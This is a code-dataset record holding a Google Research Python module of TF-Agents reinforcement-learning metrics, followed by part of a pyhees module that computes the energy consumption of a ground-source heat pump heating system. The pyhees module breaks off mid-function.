<filename>safemrl/utils/metrics.py # coding=utf-8 # Copyright 2019 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Custom TFAgent PyMetric for minitaur and point-mass environments. AverageEarlyFailureMetric used for detecting fall count for minitaur env, and AverageFallenMetric and AverageSuccessMetric used for poit-mass envs. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import gin import numpy as np from tf_agents.metrics import py_metrics from tf_agents.utils import numpy_storage @gin.configurable class AverageEarlyFailureMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, max_episode_len=500, name='AverageEarlyFailure', buffer_size=10, batch_size=None): """Creates an AverageEnvObsDict.""" self._np_state = numpy_storage.NumpyState() self._max_episode_len = max_episode_len # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.episode_steps = np.array(0, dtype=np.int32) super(AverageEarlyFailureMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.episode_steps = np.zeros(shape=(batch_size,), dtype=np.int32) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. 
Args: trajectory: a tf_agents.trajectory.Trajectory. """ episode_steps = self._np_state.episode_steps is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) episode_steps[not_last] += 1 if len(is_last[0]) > 0: self.add_to_buffer(episode_steps[is_last] < self._max_episode_len) episode_steps[is_last] = 0 @gin.configurable class AverageFallenMetric(py_metrics.StreamingMetric): """Computes average fallen rate for PointMass envs in buffer_size episodes.""" def __init__(self, dtype=np.bool, name='AverageFallen', buffer_size=10, batch_size=None): """Creates an AverageFallenMetric.""" # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._dtype = dtype super(AverageFallenMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ is_last = np.where(trajectory.is_boundary()) if len(is_last[0]) > 0: self.add_to_buffer(trajectory.observation['fallen'][is_last]) @gin.configurable class AverageSuccessMetric(py_metrics.StreamingMetric): """Computes average success rate for PointMass env in buffer_size episodes.""" def __init__(self, name='AverageSuccess', buffer_size=10, batch_size=None): """Creates an AverageSuccessMetric.""" # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). super(AverageSuccessMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. 
""" is_last = np.where(trajectory.is_last()) if len(is_last[0]) > 0: succ = np.logical_and( np.logical_not(trajectory.observation['fallen'][is_last]), trajectory.reward[is_last] > 0.) self.add_to_buffer(succ) @gin.configurable class MinitaurAverageSpeedMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, name='MinitaurAverageSpeed', buffer_size=10, batch_size=None): """Creates a metric for minitaur speed stats.""" self._np_state = numpy_storage.NumpyState() # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.episode_steps = np.array(0, dtype=float) self._np_state.speed = np.array(0, dtype=float) super(MinitaurAverageSpeedMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.episode_steps = np.zeros(shape=(batch_size,), dtype=np.int32) self._np_state.speed = np.zeros(shape=(batch_size,), dtype=float) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. 
""" episode_steps = self._np_state.episode_steps total_speed = self._np_state.speed is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) total_speed[not_last] += trajectory.observation['current_vel'][not_last] episode_steps[not_last] += 1 if len(is_last[0]) > 0: self.add_to_buffer(total_speed[is_last]/episode_steps[is_last]) episode_steps[is_last] = 0 total_speed[is_last] = 0 @gin.configurable class MinitaurAverageMaxSpeedMetric(py_metrics.StreamingMetric): """Computes average early failure rate in buffer_size episodes.""" def __init__(self, name='MinitaurAverageMaxSpeed', buffer_size=10, batch_size=None): """Creates a metric for minitaur speed stats.""" self._np_state = numpy_storage.NumpyState() # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._np_state.speed = np.array(0, dtype=float) super(MinitaurAverageMaxSpeedMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): """Resets stat gathering variables.""" self._np_state.speed = np.zeros(shape=(batch_size,), dtype=float) def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ max_speed = self._np_state.speed is_last = np.where(trajectory.is_boundary()) not_last = np.where(~trajectory.is_boundary()) if len(not_last[0]) > 0: max_speed[not_last] = np.max([trajectory.observation['current_vel'][not_last], max_speed[not_last]], axis=0) if len(is_last[0]) > 0: self.add_to_buffer(max_speed[is_last]) max_speed[is_last] = 0 @gin.configurable class CubeAverageScoreMetric(py_metrics.StreamingMetric): """Computes average score at end of trajectory""" def __init__(self, env, name='AverageScore', buffer_size=10, batch_size=None): """ Creates an CubeAverageScoreMetric. 
Args: env: Instance of gym.Env that implements get_score() which updates the metric name: metric name buffer_size: number of episodes to compute average over """ # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). self._env = env batch_size = batch_size or len(env) self._np_state = numpy_storage.NumpyState() self._np_state.adds_to_buff = np.array(0, dtype=float) # used so that buff is not over-populated by returned trajectories from short episodes super(CubeAverageScoreMetric, self).__init__( name, buffer_size=buffer_size, batch_size=batch_size) def _reset(self, batch_size): return def _batched_call(self, trajectory): """Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. """ is_last = np.where(trajectory.is_last()) if len(is_last[0]) > 0: for idx in is_last[0]: self.add_to_buffer([self._env[idx].last_score]) self._np_state.adds_to_buff[idx] += 1
en
0.753511
# coding=utf-8 # Copyright 2019 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 Custom TFAgent PyMetric for minitaur and point-mass environments. AverageEarlyFailureMetric used for detecting fall count for minitaur env, and AverageFallenMetric and AverageSuccessMetric used for poit-mass envs. Computes average early failure rate in buffer_size episodes. Creates an AverageEnvObsDict. # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). Resets stat gathering variables. Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. Computes average fallen rate for PointMass envs in buffer_size episodes. Creates an AverageFallenMetric. # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. Computes average success rate for PointMass env in buffer_size episodes. Creates an AverageSuccessMetric. # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. Computes average early failure rate in buffer_size episodes. Creates a metric for minitaur speed stats. 
# Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). Resets stat gathering variables. Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. Computes average early failure rate in buffer_size episodes. Creates a metric for minitaur speed stats. # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). Resets stat gathering variables. Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory. Computes average score at end of trajectory Creates an CubeAverageScoreMetric. Args: env: Instance of gym.Env that implements get_score() which updates the metric name: metric name buffer_size: number of episodes to compute average over # Set a dummy value on self._np_state.obs_val so it gets included in # the first checkpoint (before metric is first called). # used so that buff is not over-populated by returned trajectories from short episodes Processes the trajectory to update the metric. Args: trajectory: a tf_agents.trajectory.Trajectory.
1.961649
2
src/pyhees/section4_7_n.py
jjj-design/pyhees
0
6627905
<reponame>jjj-design/pyhees<filename>src/pyhees/section4_7_n.py # ============================================================================ # 付録 N 地中熱ヒートポンプ温水暖房機 # ============================================================================ import numpy as np from pyhees.section4_7_common import get_Q_out_H_hs_d_t from pyhees.section4_8_a import calc_e_ref_H_th import pyhees.section4_7_h as appendix_H # ============================================================================ # N3. 暖房エネルギー消費量 # ============================================================================ # ============================================================================ # N.3.1 消費電力量 # ============================================================================ def calc_E_E_hs_d_t(Q_dmd_H_hs_d_t, Theta_ex_a_Ave, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_SW_d_t, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の消費電力量 (1) Args: Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_SW_d_t(ndarray): 往き温水温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 1時間当たりの熱源機の消費電力量 (kWh/h) """ # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = get_L_max_H(L_H_x_t_i) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = get_R_L_max(L_max_H, L_max_C) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) Theta_gsRW_d_ave_d = 
get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(16) q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs) # ---------- 温水暖房用熱源機内の平均放熱損失 ---------- # 日付dの時刻tにおける温水暖房用の熱源機内部の平均放熱損失 (kw) (N.9) q_loss_H_hs_d_t = get_q_loss_H_hs_d_t() # ---------- 温水暖房用熱源機の平均暖房出力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) Q_max_H_hs_d_t = calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType) # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t) # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) q_out_H_hs_d_t = get_q_out_H_hs_d_t(Q_out_H_hs_d_t) # ---------- 温水暖房用熱源機の最大暖房能力に対する平均負荷率 ---------- # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) qr_out_H_hs_d_t = get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA) # ---------- 補機の消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) E_aux_hs_d_t = calc_E_aux_hs_d_t(qr_out_H_hs_d_t) # ---------- ポンプの消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量 (kWh/h) (10a) E_pump_gsRW_d_t = calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t) # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量 (kWh/h) (9a) E_pump_SW_d_t = calc_E_pump_SW_d_t(qr_out_H_hs_d_t) # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (kWh/h) (8) E_pump_hs_d_t = get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t) # ---------- 圧縮機の消費電力量 ---------- # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(7a) Theta_ref_SH_d_t = calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(6a) Theta_ref_SC_d_t = calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t) # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) Theta_ref_cnd_d_t = calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(4a) Theta_ref_evp_d_t = calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d) # 日付dの時刻tにおける1時間当たりの圧縮機の圧縮効率 (-) (3a) Mu_d_t = 
calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t) # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (kWh/h) (2) E_comp_hs_d_t, _ = get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t) # ---------- 熱源機の消費電力量 ---------- # 1時間当たりの熱源機の消費電力量 (kWh/h) (1) E_E_hs_d_t = E_comp_hs_d_t + E_pump_hs_d_t + E_aux_hs_d_t E_E_hs_d_t[q_out_H_hs_d_t == 0] = 0 return E_E_hs_d_t # ============================================================================ # N.3.2 ガス消費量 # ============================================================================ def get_E_G_hs_d_t(): """熱源機のガス消費量 Args: Returns: ndarray: 熱源機のガス消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.3.3 灯油消費量 # ============================================================================ def get_E_K_hs_d_t(): """熱源機の灯油消費量 Args: Returns: ndarray: 熱源機の灯油消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.3.4 その他の一次エネルギー消費量 # ============================================================================ def get_E_M_hs_d_t(): """熱源機のその他の燃料の一次エネルギー消費量 Args: Returns: ndarray: 熱源機のその他の燃料の一次エネルギー消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.4 圧縮機の消費電力量 # ============================================================================ def get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t): """日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_out_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 q_loss_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Mu_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Returns: ndarray: 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 """ # 
圧縮機の消費電力に対する補正係数を計算する式の係数(-) (2c) k_comp_a = -0.7309 k_comp_b = 0.67 k_comp_c = 1.0319 # 日付𝑑の時刻𝑡における圧縮機の消費電力に対する補正係数(-) (2b) f_comp_act_d_t = np.clip(k_comp_a * qr_out_H_hs_d_t + (1 - k_comp_a * k_comp_b), 1, None) * k_comp_c # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2a) E_comp_hs_d_t = f_comp_act_d_t * ((q_out_H_hs_d_t + q_loss_H_hs_d_t) / Mu_d_t) E_comp_hs_d_t[Theta_ref_evp_d_t >= Theta_ref_cnd_d_t] = 0 return E_comp_hs_d_t, f_comp_act_d_t def calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t): """日付dの時刻tにおける圧縮機の圧縮効率 (3a) Args: Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_SC_d_t(ndarray): ヒートポンプサイクルの過冷却度(℃) Theta_ref_SH_d_t(ndarray): ヒートポンプサイクルの過熱度(℃) Returns: ndarray: 日付dの時刻tにおける圧縮機の圧縮効率 (3a) """ # Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_0 = get_K_Mu_h_0() # Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_1 = get_K_Mu_h_1() # Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_2 = get_K_Mu_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの理論暖房効率(-) 4章8節付録A(1) e_ref_H_th_d_t = calc_e_ref_H_th(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t) # 日付dの時刻tにおける圧縮機の圧縮効率 (3a) Mu_d_t = K_Mu_h_2 * (e_ref_H_th_d_t ** 2) + K_Mu_h_1 * e_ref_H_th_d_t + K_Mu_h_0 Mu_d_t[e_ref_H_th_d_t > 10] = K_Mu_h_2 * (10 ** 2) + K_Mu_h_1 * 10 + K_Mu_h_0 return Mu_d_t def get_K_Mu_h_0(): """Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return -0.430363368361459 def get_K_Mu_h_1(): """Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return 0.698531770387591 def get_K_Mu_h_2(): """Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return 0.0100164335768507 def calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d): """日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: 
日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) """ # Kevph0:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_0 = get_K_evp_h_0() # Kevph1:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_1 = get_K_evp_h_1() # Kevph2:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_2 = get_K_evp_h_2() # Kevph12:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_12 = get_K_evp_h_12() # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Theta_ref_evp_d_t = np.clip(K_evp_h_0 + K_evp_h_1 * np.repeat(Theta_gsRW_d_ave_d, 24) + K_evp_h_2 * qr_out_H_hs_d_t + K_evp_h_12 * np.repeat(Theta_gsRW_d_ave_d, 24) * qr_out_H_hs_d_t, -50, None) return Theta_ref_evp_d_t def get_K_evp_h_0(): """Kevph0:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph0:蒸発温度を計算する式の係数 """ return -2.95315205817646 def get_K_evp_h_1(): """Kevph1:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph1:蒸発温度を計算する式の係数 """ return 0.915893610614308 def get_K_evp_h_2(): """Kevph2:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph2:蒸発温度を計算する式の係数 """ return -11.8319776584846 def get_K_evp_h_12(): """Kevph12:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph12:蒸発温度を計算する式の係数 """ return 0.29704275467947 def calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t): """日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) Args: qr_out_H_hs_d_t(param Theta_SW_d_t: 日付dの時刻tにおける往き温水温度(℃)): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 日付dの時刻tにおける往き温水温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃) """ # Kcndh0:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_0 = get_K_cnd_h_0() # Kcndh1:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_1 = get_K_cnd_h_1() # Kcndh2:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_2 = get_K_cnd_h_2() # Kcndh12:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_12 = get_K_cnd_h_12() # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (5a) Theta_ref_cnd_d_t = np.clip(K_cnd_h_0 + K_cnd_h_1 * Theta_SW_d_t + K_cnd_h_2 * qr_out_H_hs_d_t + K_cnd_h_12 * Theta_SW_d_t * qr_out_H_hs_d_t, None, 65) return Theta_ref_cnd_d_t def get_K_cnd_h_0(): """Kcndh0:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh0:凝縮温度を計算する式の係数 """ return 3.6105623002886 def get_K_cnd_h_1(): """Kcndh1:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: 
Kcndh1:凝縮温度を計算する式の係数 """ return 0.930136847064537 def get_K_cnd_h_2(): """Kcndh2:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh2:凝縮温度を計算する式の係数 """ return 0.494024927234563 def get_K_cnd_h_12(): """Kcndh12:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: ndarray: Kcndh12:凝縮温度を計算する式の係数 """ return 0.00770898511188855 def calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t): """日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)(6a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 往き温水温度 (℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) """ # Ksch0:過冷却度を計算する式の係数 (-) (6b) K_sc_h_0 = get_K_sc_h_0() # Ksch1:過冷却度を計算する式の係数 (-) (6b) K_sc_h_1 = get_K_sc_h_1() # Ksch2:過冷却度を計算する式の係数 (-) (6b) K_sc_h_2 = get_K_sc_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) (6a) Theta_ref_SC_d_t = np.clip(K_sc_h_0 + K_sc_h_1 * Theta_SW_d_t + K_sc_h_2 * qr_out_H_hs_d_t, 0, None) return Theta_ref_SC_d_t def get_K_sc_h_0(): """Ksch0:過冷却度を計算する式の係数(-) (6b) Args: Returns: float: Ksch0:過冷却度を計算する式の係数(-) (6b) """ return -4.02655782981397 def get_K_sc_h_1(): """Ksch1:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch1:過冷却度を計算する式の係数 """ return 0.0894330494418674 def get_K_sc_h_2(): """Ksch2:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch2:過冷却度を計算する式の係数 """ return 14.3457831669162 def calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d): """日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)(7a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) """ # Kshh0:過熱度を計算する式の係数 (-) (7b) K_sh_h_0 = get_K_sh_h_0() # Kshh1:過熱度を計算する式の係数 (-) (7b) K_sh_h_1 = get_K_sh_h_1() # Kshh2:過熱度を計算する式の係数 (-) (7b) K_sh_h_2 = get_K_sh_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) (7a) Theta_ref_SC_d_t = np.clip(K_sh_h_0 + K_sh_h_1 * qr_out_H_hs_d_t + K_sh_h_2 * np.repeat(Theta_gsRW_d_ave_d, 24), 0, None) return Theta_ref_SC_d_t def get_K_sh_h_0(): """Kshh0:過熱度を計算する式の係数(-) (7b) Args: Returns: float: Kshh0:過熱度を計算する式の係数 """ 
return 0.819643791668597 def get_K_sh_h_1(): """Kshh1:過熱度を計算する式の係数 (-) (7b) Args: Returns: float: Kshh1:過熱度を計算する式の係数 (-) """ return 2.99282570323758 def get_K_sh_h_2(): """Kshh2:過熱度を計算する式の係数 (-) (7b) Args: Returns: Kshh2:過熱度を計算する式の係数 (-) """ return -0.0762659183765636 # ============================================================================ # N.5 ポンプの消費電力量 # ============================================================================ def get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t): """日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) Args: E_pump_SW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) E_pump_gsRW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりのポンプの消費電力量(kWh/h) """ # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) E_pump_hs_d_t = E_pump_SW_d_t + E_pump_gsRW_d_t return E_pump_hs_d_t def calc_E_pump_SW_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) """ # apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) a_pump_SW = get_a_pump_SW() # bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) b_pump_SW = get_b_pump_SW() # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) E_pump_SW_d_t = a_pump_SW * qr_out_H_hs_d_t + b_pump_SW * (qr_out_H_hs_d_t ** 2) return E_pump_SW_d_t def get_a_pump_SW(): """apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) """ return 0.041972403 def get_b_pump_SW(): """bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) """ return 0.104478967 def calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) """ # apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) a_pump_gsRW = get_a_pump_gsRW() # bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) b_pump_gsRW = get_b_pump_gsRW() # 
